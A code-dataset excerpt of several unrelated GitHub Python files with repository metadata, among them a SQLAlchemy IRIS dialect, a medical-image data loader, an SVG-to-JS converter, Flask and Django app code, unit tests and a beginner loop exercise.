\"WITH\",\n \"WORK\",\n \"WRITE\",\n ]\n)\n\n\nclass IRISCompiler(sql.compiler.SQLCompiler):\n \"\"\"IRIS specific idiosyncrasies\"\"\"\n\n def limit_clause(self, select, **kw):\n return \"\"\n\n def fetch_clause(self, select, **kw):\n return \"\"\n\n def visit_empty_set_expr(self, type_):\n return \"SELECT 1 WHERE 1!=1\"\n\n def _get_limit_or_fetch(self, select):\n if select._fetch_clause is None:\n return select._limit_clause\n else:\n return select._fetch_clause\n\n def get_select_precolumns(self, select, **kw):\n\n text = \"\"\n if select._has_row_limiting_clause and self._use_top(select):\n text += \"TOP %s \" % self.process(\n self._get_limit_or_fetch(select), **kw\n )\n\n if select._distinct or select._distinct_on:\n if select._distinct_on:\n text += (\n \"DISTINCT ON (\"\n + \", \".join(\n [\n self.process(col, **kw)\n for col in select._distinct_on\n ]\n )\n + \") \"\n )\n else:\n text += \"DISTINCT \"\n\n return text\n\n def _use_top(self, select):\n return (select._offset_clause is None) and (\n select._simple_int_clause(select._limit_clause)\n or select._simple_int_clause(select._fetch_clause)\n )\n\n def translate_select_structure(self, select_stmt, **kwargs):\n \"\"\"Look for ``LIMIT`` and OFFSET in a select statement, and if\n so tries to wrap it in a subquery with ``row_number()`` criterion.\n\n \"\"\"\n select = select_stmt\n\n if (\n select._has_row_limiting_clause\n and not self._use_top(select)\n and not getattr(select, \"_iris_visit\", None)\n ):\n _order_by_clauses = [\n sql_util.unwrap_label_reference(elem)\n for elem in select._order_by_clause.clauses\n ]\n\n limit_clause = self._get_limit_or_fetch(select)\n offset_clause = select._offset_clause\n\n select = select._generate()\n select._iris_visit = True\n label = \"iris_rn\"\n select = (\n select.add_columns(\n sql.func.ROW_NUMBER()\n .over(order_by=_order_by_clauses)\n .label(label)\n )\n .order_by(None)\n .alias()\n )\n\n iris_rn = sql.column(label)\n limitselect = sql.select(\n *[c for c in select.c if c.key != label]\n )\n if offset_clause is not None:\n if limit_clause is not None:\n limitselect = limitselect.where(\n between(iris_rn, offset_clause + 1,\n limit_clause + offset_clause)\n )\n else:\n limitselect = limitselect.where(iris_rn > offset_clause)\n else:\n limitselect = limitselect.where(iris_rn <= (limit_clause))\n return limitselect\n else:\n return select\n\n\nclass IRISDDLCompiler(sql.compiler.DDLCompiler):\n \"\"\"IRIS syntactic idiosyncrasies\"\"\"\n\n def visit_create_schema(self, create, **kw):\n return \"\"\n\n def visit_drop_schema(self, drop, **kw):\n return \"\"\n\n def visit_check_constraint(self, constraint, **kw):\n raise exc.CompileError(\"Check CONSTRAINT not supported\")\n\n\nclass IRISTypeCompiler(compiler.GenericTypeCompiler):\n def visit_boolean(self, type_, **kw):\n return \"BIT\"\n\n\nclass IRISIdentifierPreparer(sql.compiler.IdentifierPreparer):\n \"\"\"Install IRIS specific reserved words.\"\"\"\n\n reserved_words = compiler.RESERVED_WORDS.copy()\n reserved_words.update(RESERVED_WORDS)\n illegal_initial_characters = compiler.ILLEGAL_INITIAL_CHARACTERS.union(\n [\"_\"]\n )\n\n def __init__(self, dialect):\n super(IRISIdentifierPreparer, self).__init__(\n dialect, omit_schema=False)\n\n\nclass IRISExecutionContext(default.DefaultExecutionContext):\n pass\n\n\nHOROLOG_ORDINAL = datetime.date(1840, 12, 31).toordinal()\n\n\nclass _IRISDate(sqltypes.Date):\n def bind_processor(self, dialect):\n def process(value):\n if value is None:\n return None\n horolog = value.toordinal() - HOROLOG_ORDINAL\n return str(horolog)\n\n return process\n\n def result_processor(self, dialect, coltype):\n def process(value):\n if value is None:\n return None\n horolog = int(value) + HOROLOG_ORDINAL\n return datetime.date.fromordinal(horolog)\n\n return process\n\n\nclass _IRISDateTime(sqltypes.DateTime):\n def bind_processor(self, dialect):\n def process(value):\n if value is not None:\n return value.strftime('%Y-%m-%d %H:%M:%S')\n return value\n\n return process\n\n def result_processor(self, dialect, coltype):\n def process(value):\n if value is not None:\n return datetime.datetime.strptime(value, '%Y-%m-%d %H:%M:%S')\n return value\n\n return process\n\n\nclass _IRISTime(sqltypes.DateTime):\n def bind_processor(self, dialect):\n def process(value):\n if value is not None:\n return value.strftime('%H:%M:%S')\n return value\n\n return process\n\n def result_processor(self, dialect, coltype):\n def process(value):\n if value is not None:\n horolog = value\n hour = horolog // 3600\n horolog -= hour * 3600\n minute = horolog // 60\n second = horolog % 60\n return datetime.time(hour, minute, second)\n return value\n\n return process\n\n\ncolspecs = {\n sqltypes.Date: _IRISDate,\n sqltypes.DateTime: _IRISDateTime,\n sqltypes.Time: _IRISTime,\n}\n\n\nclass IRISDialect(default.DefaultDialect):\n driver = 'iris'\n\n default_schema_name = \"SQLUser\"\n\n default_paramstyle = \"format\"\n\n supports_native_decimal = True\n supports_sane_rowcount = True\n supports_sane_multi_rowcount = True\n supports_alter = True\n supports_schemas = True\n supports_views = True\n\n supports_sequences = False\n\n supports_statement_cache = False\n postfetch_lastrowid = False\n non_native_boolean_check_constraint = False\n supports_simple_order_by_label = False\n supports_empty_insert = False\n supports_is_distinct_from = False\n\n colspecs = colspecs\n\n ischema_names = ischema_names\n\n statement_compiler = IRISCompiler\n ddl_compiler = IRISDDLCompiler\n preparer = IRISIdentifierPreparer\n type_compiler = IRISTypeCompiler\n execution_ctx_cls = IRISExecutionContext\n\n def __init__(self, **kwargs):\n default.DefaultDialect.__init__(self, **kwargs)\n\n @classmethod\n def dbapi(cls):\n import iris._IRISNative as irisnative\n import iris.dbapi._DBAPI as dbapi\n dbapi.connect = irisnative.connect\n dbapi.paramstyle = \"format\"\n return dbapi\n\n def create_connect_args(self, url):\n opts = {}\n opts[\"hostname\"] = url.host\n opts[\"port\"] = int(url.port) if url.port else 1972\n opts[\"namespace\"] = url.database if url.database else 'USER'\n opts[\"username\"] = url.username if url.username else ''\n opts[\"password\"] = url.password if url.password else ''\n\n return ([], opts)\n\n def _fix_for_params(self, query, params, many=False):\n if query.endswith(';'):\n query = query[:-1]\n if params is None:\n params = []\n elif hasattr(params, 'keys'):\n # Handle params as dict\n args = {k: \"?\" % k for k in params}\n query = query % args\n else:\n # Handle params as sequence\n args = ['?' for i in range(len(params if not many else params[0]))]\n query = query % tuple(args)\n newparams = list()\n for p in params:\n newparams.append(p if not many else list(p)\n if len(p) > 1 else p[0])\n return query, newparams\n\n def do_execute(self, cursor, query, params, context=None):\n query, params = self._fix_for_params(query, params)\n cursor.execute(query, params)\n\n def do_executemany(self, cursor, query, params, context=None):\n query, params = self._fix_for_params(query, params, True)\n cursor.executemany(query, params)\n\n def get_schema(self, schema=None):\n if schema is None:\n return 'SQLUser'\n return schema\n\n @reflection.cache\n def get_schema_names(self, connection, **kw):\n s = sql.select(ischema.schemata.c.schema_name).order_by(\n ischema.schemata.c.schema_name\n )\n schema_names = [r[0] for r in connection.execute(s)]\n return schema_names\n\n @reflection.cache\n def get_table_names(self, connection, schema=None, **kw):\n tables = ischema.tables\n schema_name = self.get_schema(schema)\n s = (\n sql.select(tables.c.table_name)\n .where(\n sql.and_(\n tables.c.table_schema == str(schema_name),\n tables.c.table_type == \"BASE TABLE\",\n )\n )\n .order_by(tables.c.table_name)\n )\n table_names = [r[0] for r in connection.execute(s)]\n return table_names\n\n @reflection.cache\n def has_table(self, connection, table_name, schema=None, **kw):\n self._ensure_has_table_connection(connection)\n tables = ischema.tables\n schema_name = self.get_schema(schema)\n\n s = (\n sql.select(func.count())\n .where(\n sql.and_(\n tables.c.table_schema == str(schema_name),\n tables.c.table_name == str(table_name),\n )\n )\n )\n return bool(connection.execute(s).scalar())\n\n @reflection.cache\n def get_indexes(self, connection, table_name, schema=None, unique=False, **kw):\n schema_name = self.get_schema(schema)\n indexes = ischema.indexes\n\n s = (\n sql.select(\n indexes.c.index_name,\n indexes.c.column_name,\n indexes.c.primary_key,\n indexes.c.non_unique,\n indexes.c.asc_or_desc,\n )\n .where(\n sql.and_(\n indexes.c.table_schema == str(schema_name),\n indexes.c.table_name == str(table_name),\n indexes.c.primary_key == sql.false(),\n (indexes.c.non_unique == sql.true()) if not unique else (1 == 1)\n )\n )\n .order_by(indexes.c.ordinal_position)\n )\n\n rs = connection.execute(s)\n\n indexes = util.defaultdict(dict)\n for row in rs:\n indexrec = indexes[row[\"INDEX_NAME\"]]\n if \"name\" not in indexrec:\n indexrec[\"name\"] = self.normalize_name(row[\"INDEX_NAME\"])\n indexrec[\"column_names\"] = []\n indexrec[\"unique\"] = not row[\"NON_UNIQUE\"]\n\n indexrec[\"column_names\"].append(\n self.normalize_name(row[\"COLUMN_NAME\"])\n )\n\n indexes = list(indexes.values())\n return indexes\n\n def get_pk_constraint(self, connection, table_name, schema=None, **kw):\n schema_name = self.get_schema(schema)\n key_constraints = ischema.key_constraints\n constraints = ischema.constraints\n\n s = (\n sql.select(\n key_constraints.c.constraint_name,\n key_constraints.c.column_name,\n )\n .join(constraints,\n sql.and_(\n key_constraints.c.constraint_name == constraints.c.constraint_name,\n key_constraints.c.table_schema == constraints.c.table_schema,\n )\n )\n .where(\n sql.and_(\n key_constraints.c.table_schema == str(schema_name),\n key_constraints.c.table_name == str(table_name),\n constraints.c.constraint_type == \"PRIMARY KEY\",\n )\n )\n .order_by(key_constraints.c.ordinal_position)\n )\n\n rs = connection.execute(s)\n\n constraint_name = None\n pkfields = []\n for row in rs:\n constraint_name = self.normalize_name(row[\"CONSTRAINT_NAME\"])\n pkfields.append(self.normalize_name(row[\"COLUMN_NAME\"]))\n\n if pkfields:\n return {\n \"constrained_columns\": pkfields,\n \"name\": constraint_name,\n }\n\n return None\n\n @reflection.cache\n def get_unique_constraints(self, connection, table_name, schema=None, **kw):\n indexes = self.get_indexes(\n connection, table_name, schema, unique=True, **kw)\n return [{'name': i['name'], 'column_names': i['column_names']}\n for i in indexes if i['unique']]\n\n @reflection.cache\n def get_foreign_keys(self, connection, table_name, schema=None, **kw):\n schema_name = self.get_schema(schema)\n ref_constraints = ischema.ref_constraints\n key_constraints = ischema.key_constraints\n key_constraints_ref = aliased(ischema.key_constraints)\n\n s = (\n sql.select(\n key_constraints.c.constraint_name,\n key_constraints.c.column_name,\n key_constraints_ref.c.table_schema,\n key_constraints_ref.c.table_name,\n key_constraints_ref.c.column_name,\n ref_constraints.c.match_option,\n ref_constraints.c.update_rule,\n ref_constraints.c.delete_rule,\n )\n .join(\n key_constraints,\n sql.and_(\n key_constraints.c.table_schema == ref_constraints.c.constraint_schema,\n key_constraints.c.constraint_name == ref_constraints.c.constraint_name,\n )\n )\n .join(\n key_constraints_ref,\n sql.and_(\n key_constraints_ref.c.constraint_schema == ref_constraints.c.unique_constraint_schema,\n key_constraints_ref.c.constraint_name == ref_constraints.c.unique_constraint_name,\n key_constraints_ref.c.ordinal_position == key_constraints.c.ordinal_position,\n )\n )\n .where(\n sql.and_(\n key_constraints.c.table_schema == str(schema_name),\n key_constraints.c.table_name == str(table_name),\n )\n )\n .order_by(key_constraints_ref.c.ordinal_position)\n )\n\n rs = connection.execute(s)\n\n fkeys = []\n\n def fkey_rec():\n return {\n \"name\": None,\n \"constrained_columns\": [],\n \"referred_schema\": None,\n \"referred_table\": None,\n \"referred_columns\": [],\n \"options\": {},\n }\n\n fkeys = util.defaultdict(fkey_rec)\n\n for row in rs:\n (\n rfknm,\n scol,\n rschema,\n rtbl,\n rcol,\n _, # match rule\n fkuprule,\n fkdelrule,\n ) = row\n\n rec = fkeys[rfknm]\n rec[\"name\"] = rfknm\n\n if fkuprule != \"NO ACTION\":\n rec[\"options\"][\"onupdate\"] = fkuprule\n\n if fkdelrule != \"NO ACTION\":\n rec[\"options\"][\"ondelete\"] = fkdelrule\n\n if not rec[\"referred_table\"]:\n rec[\"referred_table\"] = rtbl\n if rschema != 'SQLUser':\n rec[\"referred_schema\"] = rschema\n\n local_cols, remote_cols = (\n rec[\"constrained_columns\"],\n rec[\"referred_columns\"],\n )\n\n local_cols.append(scol)\n remote_cols.append(rcol)\n\n if fkeys:\n return list(fkeys.values())\n\n return []\n\n def get_columns(self, connection, table_name, schema=None, **kw):\n schema_name = self.get_schema(schema)\n columns = ischema.columns\n\n whereclause = sql.and_(\n columns.c.table_name == str(table_name),\n columns.c.table_schema == str(schema_name),\n )\n\n s = (\n sql.select(\n columns.c.column_name,\n columns.c.data_type,\n columns.c.is_nullable,\n columns.c.character_maximum_length,\n columns.c.numeric_precision,\n columns.c.numeric_scale,\n columns.c.column_default,\n columns.c.collation_name,\n columns.c.auto_increment,\n # columns.c.description,\n )\n .select_from(columns)\n .where(whereclause)\n .order_by(columns.c.ordinal_position)\n )\n\n c = connection.execution_options(future_result=True).execute(s)\n\n cols = []\n for row in c.mappings():\n name = row[columns.c.column_name]\n type_ = row[columns.c.data_type].upper()\n nullable = row[columns.c.is_nullable] == \"YES\"\n charlen = row[columns.c.character_maximum_length]\n numericprec = row[columns.c.numeric_precision]\n numericscale = row[columns.c.numeric_scale]\n default = row[columns.c.column_default]\n collation = row[columns.c.collation_name]\n autoincrement = row[columns.c.auto_increment]\n # description = row[columns.c.description]\n\n coltype = self.ischema_names.get(type_, None)\n\n kwargs = {}\n if coltype in (\n VARCHAR,\n BINARY,\n TEXT,\n VARBINARY,\n ):\n if charlen == -1:\n charlen = None\n kwargs[\"length\"] = charlen\n if collation:\n kwargs[\"collation\"] = collation\n if coltype is None:\n util.warn(\n \"Did not recognize type '%s' of column '%s'\"\n % (type_, name)\n )\n coltype = sqltypes.NULLTYPE\n else:\n if issubclass(coltype, sqltypes.Numeric):\n kwargs[\"precision\"] = numericprec\n\n if not issubclass(coltype, sqltypes.Float):\n kwargs[\"scale\"] = numericscale\n\n coltype = coltype(**kwargs)\n\n cdict = {\n \"name\": name,\n \"type\": coltype,\n \"nullable\": nullable,\n \"default\": default,\n \"autoincrement\": autoincrement,\n # \"comment\": description,\n }\n cols.append(cdict)\n\n if cols:\n return cols\n\n return None\n\n @reflection.cache\n def get_view_names(self, connection, schema=None, **kw):\n schema_name = self.get_schema(schema)\n views = ischema.views\n s = (\n sql.select(views.c.table_name)\n .where(\n views.c.table_schema == str(schema_name),\n )\n .order_by(views.c.table_name)\n )\n view_names = [r[0] for r in connection.execute(s)]\n return view_names\n\n @reflection.cache\n def get_view_definition(self, connection, view_name, schema=None, **kw):\n schema_name = self.get_schema(schema)\n views = ischema.views\n\n view_def = connection.execute(\n sql.select(views.c.view_definition)\n .where(\n views.c.table_schema == str(schema_name),\n views.c.table_name == str(view_name),\n )\n ).scalar()\n\n if view_def:\n return view_def\n return None\n","repo_name":"SergeyMi37/sqlalchemy-iris","sub_path":"sqlalchemy_iris/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":26718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"14770409224","text":"import os\nimport cv2\nimport sys\nimport pdb\nimport six\nimport glob\nimport time\nimport torch\nimport random\nimport pandas\nimport warnings\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\nimport numpy as np\n# import pyarrow as pa\nfrom PIL import Image\nimport torch.utils.data as data\nimport matplotlib.pyplot as plt\nfrom torch.utils.data.sampler import Sampler\n\nsys.path.append(\"..\")\n\n\nclass BaseFeeder(data.Dataset):\n # initialization\n def __init__(self, folder_path, prefix=\"./\", mean=None, std=None, mode='train', resize_h=224,\n resize_w=224, img_dim=1):\n self.folder_path = folder_path\n self.prefix = prefix\n self.files = []\n self.resize_h=resize_h\n self.resize_w=resize_w\n self.img_dim=img_dim\n self.mode = mode\n folder = os.path.join(prefix, folder_path, mode, \"\")\n print(folder)\n for file in os.listdir(folder):\n d = os.path.join(folder, file)\n if os.path.isdir(d):\n if os.path.isfile(d + \"/{}_0\".format(file) + \".png\"):\n self.files.append(d + \"/{}_0\".format(file))\n if os.path.isfile(d + \"/{}_1\".format(file) + \".png\"):\n self.files.append(d + \"/{}_1\".format(file))\n \n if mean == None or std == None:\n print(\"Calculating mean and std of the {} set...\".format(mode))\n self.mean, self.std = self.calculate_stat()\n else:\n self.mean = mean\n self.std = std\n\n def calculate_stat(self):\n num_image = 0\n psum = torch.tensor([0.0,]*self.img_dim)\n psum_sq = torch.tensor([0.0,]*self.img_dim)\n for file in self.files:\n num_image+=1\n\n img_path = file + \".png\"\n \n image = cv2.imread(img_path, cv2.IMREAD_ANYDEPTH)\n image = torch.from_numpy(cv2.resize(image, (self.resize_h,\n self.resize_w), interpolation = cv2.INTER_AREA)).type(torch.FloatTensor)\n \n if self.img_dim == 1:\n psum += image.sum()\n psum_sq += (image ** 2).sum()\n else:\n psum += image.sum()\n psum_sq += (image ** 2).sum() \n\n count = num_image*self.resize_h*self.resize_w \n total_mean = psum / count\n total_var = (psum_sq / count) - (total_mean ** 2)\n total_std = torch.sqrt(total_var)\n\n return total_mean.item(), total_std.item()\n # getitem attribute\n def __getitem__(self, idx):\n img_path = self.files[idx] + \".png\"\n image = cv2.imread(img_path, cv2.IMREAD_ANYDEPTH)\n image = cv2.resize(image, (224,224), interpolation = cv2.INTER_AREA)\n image = np.expand_dims(image, axis=0)\n image = torch.from_numpy(image).type(torch.FloatTensor)\n image = (image - self.mean)/(self.std + 0.00001)\n\n mask_path = self.files[idx] + \"_cancer.png\"\n mask = cv2.imread(mask_path, cv2.IMREAD_ANYDEPTH)\n mask = cv2.resize(mask, (224,224), interpolation = cv2.INTER_AREA) \n mask = torch.from_numpy(mask).type(torch.FloatTensor)\n mask = torch.unsqueeze(mask, 0)\n\n return image, mask\n\n # collate_fn method\n # batch is list\n @staticmethod\n def collate_fn(batch):\n imgs, masks = list(zip(*batch))\n\n imgs = torch.stack(imgs, dim = 0)\n\n masks = torch.stack(masks, dim = 0)\n\n return imgs, masks\n\n def __len__(self):\n return len(self.files)\n\n def record_time(self):\n self.cur_time = time.time()\n return self.cur_time\n\n def split_time(self):\n split_time = time.time() - self.cur_time\n self.record_time()\n return split_time\n\n\nif __name__ == \"__main__\":\n\n pass\n\n # feeder = BaseFeeder(r\"E:\\CSAWS\\CSAW-S\\CsawS\\anonymized_dataset\", prefix=\"\")\n # dataloader = torch.utils.data.DataLoader(\n # dataset=feeder,\n # batch_size=2,\n # shuffle=True,\n # drop_last=True,\n # num_workers=0,\n # )\n # for batch_idx, data in enumerate(dataloader):\n # print(data[0].shape)\n # break","repo_name":"Tommy-Ngx/breast_cancer_segmentation","sub_path":"dataset/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2832582047","text":"from math import *\r\nimport os\r\nfrom xml.dom import minidom\r\nimport svg.path\r\n\r\n# MAX VECTOR VALUES\r\nMAX_VALUE = 800\r\n\r\np = \"\"\r\n# OPEN RAW DATAS FILE\r\nfpath = f\"svgs/{p}.svg\"\r\nf = open(fpath, \"r\")\r\ndoc = minidom.parse(f) # parseString also exists\r\npath_strings = [path.getAttribute('d') for path\r\n in doc.getElementsByTagName('path')]\r\n\r\ndoc.unlink()\r\nf.close()\r\n\r\n# parse path\r\npath_strings = path_strings[0]\r\npath = svg.path.parse_path(path_strings)\r\n\r\ndef f(t):\r\n return path.point(t)\r\n\r\nt = 0\r\ndt = .0001\r\npts = []\r\nmaximum = 0\r\nwhile(t<1):\r\n y = f(t)\r\n pts.append(y)\r\n maximum = max(maximum,abs(y))\r\n t = t + dt\r\n\r\n# CREATE END STRING\r\ntextReturn = f\"let drawing_{p} = [\\n\"\r\n\r\nfor c in pts:\r\n textReturn += \" {re: \" + str(MAX_VALUE*c.real/maximum) + \", im: \" + str(MAX_VALUE * c.imag/maximum) + \"},\\n\"\r\ntextReturn += \"];\"\r\n\r\n\r\n# OUTPUT TO DATAS FILE\r\nf2 = open(f\"drawing_{p}.js\", \"w\")\r\nf2.write(textReturn)\r\nf2.close()\r\n\r\n\r\n# SUCCESS\r\nprint(f\"SUCCESS converting SVG file to JS file: drawing_{p}.js\")\r\n","repo_name":"katanovbrian/fourier_draw","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16269651130","text":"from psych.factory import create_app\nfrom psych.db import disorders_init, accounts_init, update_status, videos_init, appointments_init\n\nimport os\nimport configparser\n\nfrom datetime import datetime, timedelta\nfrom flask_apscheduler import APScheduler\n\nfrom flask_mail import Mail\n\nconfig = configparser.ConfigParser()\nconfig.read(os.path.abspath(os.path.join(\".ini\")))\n\n\nclass Config:\n SCHEDULER_API_ENABLED = True\n\n\nscheduler = APScheduler()\nmail = Mail()\n\n# interval examples\n@scheduler.task(\"interval\", id=\"status_update\", seconds=60)\ndef status_update():\n with scheduler.app.app_context():\n current_time = (datetime.now() + timedelta(hours=1)\n ).strftime('%Y/%m/%d_%H')\n print(f\"TRY TO UPDATE ACTIVE APPOINMENTS WITH {current_time} ...\")\n update_status(machine_time=current_time, mail=mail)\n \n\n\nif __name__ == \"__main__\":\n app = create_app()\n app.config['DEBUG'] = False\n app.config['MONGO_URI'] = config['PROD']['DB_URI']\n\n with app.app_context():\n disorders_init()\n accounts_init()\n videos_init()\n appointments_init()\n print(\"DB connected!\")\n print(\"DB init!\")\n\n app.config.from_object(Config())\n scheduler.init_app(app)\n scheduler.start()\n\n app.config['SENDER_TUPLE_1'] = config['PROD']['MAIL_SENDER']\n app.config['SENDER_TUPLE_2'] = config['PROD']['MAIL_USERNAME']\n \n app.config.update(\n # EMAIL SETTINGS\n MAIL_SERVER='smtp.gmail.com',\n MAIL_PORT=465,\n MAIL_USE_SSL=True,\n MAIL_DEFAULT_SENDER=(app.config['SENDER_TUPLE_1'], app.config['SENDER_TUPLE_2']),\n MAIL_MAX_EMAILS=10,\n MAIL_USERNAME=config['PROD']['MAIL_USERNAME'],\n MAIL_PASSWORD=config['PROD']['MAIL_PASSWORD']\n )\n mail.init_app(app)\n app.run()\n","repo_name":"hc-psy/wp-final-api","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38736679171","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 3 18:38:12 2019\r\n\r\n@author: gontier\r\n\"\"\"\r\n\r\n# Computes the log likelihood of data under model M_2\r\n# INPUT : vector of EPSCs, values for N, p, q, sigma, and tauD, and vector of ISI\r\n# (convention : delta_t[0] = 0, delta_t[i] = t_i - t_{i-1})\r\n# OUTPUT : log p(EPSC|theta)\r\n\r\nimport numpy as np\r\nimport scipy.stats\r\n\r\ndef ll_binomial_tau_D(EPSP,N,p,q,sigma,tau_D,delta_t):\r\n T = EPSP.size\r\n \r\n # Uses the Baum-Welch algorithm (https://en.wikipedia.org/wiki/Baum%E2%80%93Welch_algorithm)\r\n A = np.zeros([N+1,N+1,N+1,N+1,T])\r\n #A[n_i,k_i,n_i+1,k_i+1,i+1] : probability to transit from i to i+1\r\n for n1 in range(N+1):\r\n for k1 in range(n1+1):\r\n for n2 in range(N+1):\r\n for k2 in range(n2+1):\r\n for i in range(T-1):\r\n A[n1,k1,n2,k2,i+1] = scipy.stats.binom.pmf(k2,n2,p)*scipy.stats.binom.pmf(n2-n1+k1,N-n1+k1,1-np.exp(-delta_t[i+1]/tau_D))\r\n \r\n \r\n B = np.zeros([N+1,N+1,T])\r\n for n in range(N+1):\r\n for k in range(n+1):\r\n for i in range(T):\r\n B[n,k,i] = scipy.stats.norm.pdf(EPSP[i],loc=q*k,scale=sigma)\r\n\r\n alpha = np.zeros([N+1,N+1,T]) #n,k,i\r\n\r\n for k in range(N+1): \r\n alpha[N,k,0] = scipy.stats.binom.pmf(k,N,p)*scipy.stats.norm.pdf(EPSP[0],loc=q*k,scale=sigma)\r\n \r\n for i in range(T-1):\r\n for n in range(N+1):\r\n for k in range(n+1):\r\n alpha[n,k,i+1] = B[n,k,i+1]*sum(alpha[nn,kk,i]*A[nn,kk,n,k,i+1] for kk in range(N+1) for nn in range (N+1))\r\n \r\n return np.log(np.sum(alpha,(0,1))[-1])","repo_name":"camillegontier/identifiability_binomial","sub_path":"likelihood/gaussian_noise/ll_binomial_STD.py","file_name":"ll_binomial_STD.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8843228334","text":"\"\"\"\nUnit test module for the Flask application in app.py\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\"\"\"\nimport json\nimport os\nimport sys\nimport unittest\n\ntest_dir = os.path.dirname(os.path.abspath(__file__))\nmain_dir = os.path.dirname(test_dir)\nsys.path.extend([test_dir, main_dir])\n\nfrom app import app, db\n\n\nif os.environ.get('DBASE_URL'):\n db_url = os.environ.get('DBASE_URL')\nelse:\n db_url = 'sqlite:///{p}'.format(p=os.path.join(main_dir, 'stops.sqlite'))\n\n\nclass AppTest(unittest.TestCase):\n \"\"\"Test all app endpoints. Assumes local database tables have been populated.\"\"\"\n\n def setUp(self):\n \"\"\"Set up test variables\"\"\"\n app.app_context().push()\n app.config['TESTING'] = True\n app.config['SQLALCHEMY_DATABASE_URI'] = db_url\n self.client = app.test_client()\n\n def tearDown(self):\n \"\"\"Close the database connection and pop the app client\"\"\"\n db.session.close()\n\n def test_codes(self):\n \"\"\"Test status codes for app endpoints\"\"\"\n endpoints = {\n 'index.html': 404,\n '/': 200,\n '/sw.js': 200,\n '/universities.html': 404,\n '/universities': 200,\n '/data/cleaner_universities.json': 404,\n '/universities/data': 200,\n '/stops?lat=42.35947&lon=-71.09296': 200,\n '/stop/5': 200,\n }\n for e, exp in endpoints.items():\n with self.subTest('Testing endpoint {e}'.format(e=e), end=e, expect=exp):\n self.assertEqual(self.client.get(e).status_code, exp)\n\n def test_stop(self):\n \"\"\"Test stop endpoints for the given MBTA stop IDs\"\"\"\n endpoints = {\n '/stop/bad': 'bad',\n '/stop/2': 'good',\n '/stop/1000': 'bad',\n '/stop/225': 'good',\n }\n for e, exp in endpoints.items():\n with self.subTest('Testing API endpoint {e}'.format(e=e), end=e, expect=exp):\n data = json.loads(self.client.get(e).data.decode('utf8'))\n self.assertEqual(data.get('status'), exp)\n\n def test_stops(self):\n \"\"\"Test the stops endpoint, which expects query strings.\"\"\"\n endpoints = {\n '/stops?lat=42.35947&lon=-71.09296': 'good',\n '/stops?lat=42.36947&lon=-71.08296': 'good',\n '/stops?lat=bad&lon=bad': 'bad',\n '/stops?lat=420.35947&lon=-710.09296': 'bad'\n }\n for e, exp in endpoints.items():\n with self.subTest('Testing API endpoint {e}'.format(e=e), end=e, expect=exp):\n data = json.loads(self.client.get(e).data.decode('utf8'))\n # Test for equality\n self.assertEqual(data.get('status'), exp)\n # Also, test that if the status is good, then stops is not empty.\n # However, if status is not good, then stops must be empty\n self.assertTrue((data.get('status') == 'good') == bool(data.get('stops')))\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"growwithgooglema/mbtaccess","sub_path":"tests/app_test.py","file_name":"app_test.py","file_ext":"py","file_size_in_byte":3023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"34680968854","text":"# 1 Создать переменную count со значением 0\n# 2 Создать переменную range_count со значением 10\n# 3 Создать переменную for_count со значением 0\n# 4 Создать переменную run со значением True\n\ncount = 0\nrange_count = 10\nfor_count = 0\nrun = True\n\n# 5. Сделать цикл while который будет работать пока run\n# Тело цикла:\n# \t5.1 Выводить в консоль “Hello Cycle”\n\nwhile run:\n print('Hello Cycle')\n\n# 6. Сделать цикл while который будет работать пока run\n# Тело цикла:\n# \t6.1 Выводить в консоль (“Step =”, count)\n# \t6.2 Переменной count прибавлять 1 с присвоением.\n\nwhile run:\n print('Step =', count)\n count += 1\n\n# 7. Сделать цикл while который будет работать пока count < range_count\n# Тело цикла:\n# \t7.1 Выводить в консоль (“Step =”, count)\n# \t7.2 Переменной count прибавлять 1 с присвоением.\n\nwhile count < range_count:\n print('Step =', count)\n count += 1\n\n# 8. Сделать цикл while который будет работать пока count < range_count\n# Тело цикла:\n# \t8.1 Выводить в консоль (“Step =”, count)\n# \t8.2 Пе��еменной count прибавлять 1 с присвоением.\n# \t8.3 Сделать if с условием, если count равен 3 то выводить в консоль (“Step =”, count, ‘If body’)\n\nwhile count < range_count:\n print('Step =', count)\n count += 1\n if count == 3:\n print('Step =', count, 'If body')\n\n# 9 Сделать цикл while который будет работать пока run\n# Тело цикла:\n# \t9.1 Выводить в консоль (“Step =”, count)\n# \t9.2 Переменной count прибавлять 1 с присвоением.\n# \t9.2 Сделать if с условием, если count равен range_count то цикл остановится.\n# \t9.3 В теле if вывести в консоль (“STOP”, count)\n\nwhile run:\n print('Step =', count)\n count += 1\n if count == range_count:\n break\nprint('STOP', count)","repo_name":"Marussia636/domashka","sub_path":"Pythoncode/HW_4.py","file_name":"HW_4.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18979309826","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nimport MongoConn\nfrom facenote import wechat\nfrom datetime import datetime\nfrom bson import json_util, objectid\nimport datetime\nimport logging\nimport json\n\nlogging.basicConfig(\n level = logging.INFO,\n format = '%(asctime)s %(levelname)s %(message)s',\n filename = './djangoLog.log',)\n\ndef index(request):\n return HttpResponse(\"login app\")\n\ndef login(request):\n if request.method == 'GET':\n res = {}\n print(request.GET)\n logging.info(request.META)\n logging.info(request.GET)\n res['name'] = request.GET.get('name', 'defaultname')\n res['passwd'] = request.GET.get('passwd')\n return HttpResponse(\"get method\")\n 